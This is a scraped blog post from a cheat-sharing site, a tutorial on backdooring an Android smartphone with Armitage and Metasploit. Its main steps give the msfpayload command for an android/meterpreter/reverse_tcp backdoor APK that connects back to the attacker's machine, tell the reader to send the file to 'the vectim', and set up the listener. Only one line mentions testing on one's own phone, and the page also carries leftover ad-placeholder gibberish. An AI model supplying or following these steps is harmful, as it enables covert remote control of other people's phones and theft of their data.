Please enable JavaScript to access this page. Kali Linux - ANDROID HACKING USING ARMITAGE - SHIELD CHEAT

SHIELD CHEAT

Share about trick, cheat and bypass on iOS, Android, and PC game, you can download game bypass or anything about game.

720X90
dasdasdas
970X90
asdsadasdas
asdasdasdas

Kali Linux - ANDROID HACKING USING ARMITAGE




Armitage is a GUI for Metasploit which makes penetration testing easier. It was developed by Raphael Mudge. This tool helps to reduce the time and also gives a good understanding of Metasploit to various security professionals. The major advantages of using this tool are that it recommends the exploits, has advanced post-exploitation features, and is a very good visualization of the targets.


Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like ubuntu .kali linux.backtrack5r3

  • 1. armitage (we use Kali Linux 1.0.7 in this tutorial)
  • 2. Android smartphone (we use HTC One android 4)



Step by Step Hacking Android Smartphone Tutorial using armitage:

1. Open terminal (CTRL + ALT + T)
2.run this command in console of armitage

command generate backdoor:
msfpayload android/meterpreter/reverse_tcp LHOST=your local ip (ifconfig) LPORT=8080 R > /root/Desktop.payload.apk

note : you can use terminal to generate the payload 





3.you need to move the payload file to android phone 

there is many way to send the file to the vectim

*for testing in your phone upload the file and install the application


4.after excuting the apk file you need toset the handler


 5.configuration
PAYLOAD : android/meterpreter/reverse_tcp

lport 8080
lhost your ip (ifconfig)

































Thank you for reading the article Kali Linux - ANDROID HACKING USING ARMITAGE . If you want to copy and paste this article, please include the link https://shieldcheat.blogspot.com/2015/03/kali-linux-android-hacking-using.html Thank you for your attention.

Share :

Facebook Twitter Google+
Back To Top